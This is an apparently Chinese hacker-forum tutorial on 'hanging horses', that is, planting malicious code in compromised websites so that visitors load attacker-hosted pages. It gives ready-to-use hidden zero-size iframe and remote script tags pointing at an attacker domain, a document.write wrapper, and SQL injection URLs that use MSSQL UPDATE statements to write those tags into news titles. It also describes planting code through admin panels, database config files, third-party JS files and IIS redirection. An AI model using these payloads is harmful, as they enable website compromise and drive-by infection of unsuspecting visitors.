多种挂马方式(申请加精)

这里我拿挂首页index.asp来举例子。
　　
　　先说一说，获得webshell的挂马方法
　　通常的挂马的都是用框架，这是最基本的挂马方式，只要不破坏原有的语言逻辑，那就想插入哪里就写哪里了，最基本的语句固然是<iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>，其中 [url]http://www.fucksb.net/mm.htm[/url]是咱们的***，下面就不一个一个提示了。

　　上面多是通常的挂马方式，也是初学者的玩法，好了，再说深一点点的，那就是js文件，好多网站上，你查看源代码都会调用js文件，其中的语句为<script language=javascript src=./ad/ad.js></script>，想到了什么，这里也能够挂马，其中咱们能够远程调用本身的js，好比:<script language=javascript src=http://www.fucksb.net/mm.js></script>这个mm.js就能够写***了，怎么写呢，一样，咱们还用最基本的iframe框架，不过在<script></script>之中可识别语言不是html，那怎么办呢，follow me,js文件能够这样写:document.write("<iframe <iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>");，这种形势，这时就能够执行此js中的代码了，固然了，说白了，其实全语句就是<script language=javascript>document.write("<iframe <iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>")</script>呵呵。。

　　聪明的你可能发现了一点，好像不止是js文件哦~，只要在<script></script>之中，不管什么后缀的文件，只要里面写的语句能够被javascript识别就会执行，对的，好比<script src=http://www.fucksb.net/mm.test></script>，又如<script src=http://www.fucksb.net/mm.lala></script>管他的后缀是什么，只要里面写的语句正确就会被执行了。

一样，若是首页调用其它网站，或者次级目录中的htm,asp等如:<iframe src=./ad/news.htm width=300 height=200></iframe>
也能够在news.htm文件里挂马，能够是htm和js，随便哪一种，这是比较隐蔽的玩法，这些适用于主页没有写权限的方法。

　 <script>同<iframe>2个相比较，好处是script总体挂马的代码长度比iframe小得多，很实用。说实用是在数据库方面，下面介绍。

  数据库挂马，这里咱们拿mssql数据库为例子。

　　这里说的是首页调用到的数据库，好比新闻，论坛，公告，等等，通常是标题。这些须要经验去检测，举个例子，好比首页有一条新闻为：“明日开业”，那么鼠标点此新闻，地址栏打开的新窗口为news.asp?id=1，这种状况，这时，就能够判断此新闻是从数据库中调用的了，固然了，咱们不说access，只说mssql。
　　首页，咱们要有这个网站中的一个注入点，好比就点在vote.asp?id=123，同时，至少是Db_owner权限，这时若是要挂马能够不用取到webshell，由于若是咱们的目的只在于挂马的话，并且有时，还得检测mssql数据库和web服务器不在同一个机器上，那挂马的方式就是更改数据库内容，这里我说的就是这种，如上面说的，首页显示的一条新闻标题为“明日开业”，若是首页显示的标题是“明日开业</a><iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>”，那这样的话，首页就会执行这段代码了，像这种状况，找到了注入点，就得找表名，如此新闻的表名为news，字段为title，id,等等，根据猜想,id=1时，暴出的字段title的值就为“明日开业”，那么90%就能够猜到了，首页调用的数据库的字段就为news表中的title，这时在注入点，能够大胆提交vote.asp?id=123;update news set title='明日开业</a><iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>' where id=1;--，这样就能够更改数据库了，前提是最少要少db_owner权限，固然也有时因为代码缘由，也能够这样提交:vote.asp?id=123';update news set title='明日开业</a><ifrmae src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>' where id=1 and '1'='1，也能够...
　　这种方法是有问题的，实战中存在很多问题，由于通常的状况下，标题都是经过<table>来限制宽度，也就是说若是你的标题的长度超过了指定的长度，那么你的代码只能写一半，这样就不能执行了，因此挂马最好的方法是用<script>这种方法来挂马了，如:
vote.asp?id=123;update news set title='明日开业</a><script src=http://www.fucksb.net/mm.js></script>' where id=1;--长度有很大的减小，很不错。

后台挂马
一般注入等不到webshell，就只能@@进后台挂马。

这里说的是进入了后台，但不能经过后台获得webshell，这时要仔细关察后台，像比较网站的连接、顶部底部的广告、均可以直接写入你的***代码，等等，后台是灵活的，具体问题具体分析。不过有一点很重要，是不要打乱前台htm源文件里的代码逻辑，好比应该闭合前面的<a><img>"( 等这些符号，应该先闭合掉如</a></img>")。

其它形式

如一首页调用了<iframe src=vote.asp?id=1&no=view width=100></iframe>此种形势，同样能够在vote.asp中直接写入iframe***代码，若是调用的是<script src=vote.asp?id=1&no=view width=100></script>在vote.asp写代码时，请用document.write("")这种格式写入，固然，若是被挂文件中还有调用的文件能够继续往深处写，若是你够狠的话，直接写到数据库配置文件中，如conn.asp，这样好多页面能够同时挂上你的一种***了。
固然这里也有js文件，同样原理。
挂一个网站的马，不必定就得攻入他，有时没有方法的同时，能够考虑跨站。好多站用了别的站的js文件，如:<script src=http://www.163.com/user.js>这种情势，这时就能够考虑只拿163.com的权限就好了，只要能修改到user.js文件就能够挂到你要挂的站点了，同理，也有<iframe src=http://www.163.com/user.htm>此种状况，同样道理，剑走偏锋，达到目的，不管用什么招数了。

服务器挂马
这里简单说一个比较狠的吧.
重定向任何调用的htm，js,等文件，只要是执行的如图

这种方法在计算中用搜索关键词是搜索不到的，反正本地怎么找也找不到。。谁能想到是在iis里设置的呢？并且调用文件那么多，怎么知道是重定向的那个文件呢？反正如今想不到有什么好方法能够解决，若是服务器如上图被挂马了，偶最好的建议是重装IIS..^_^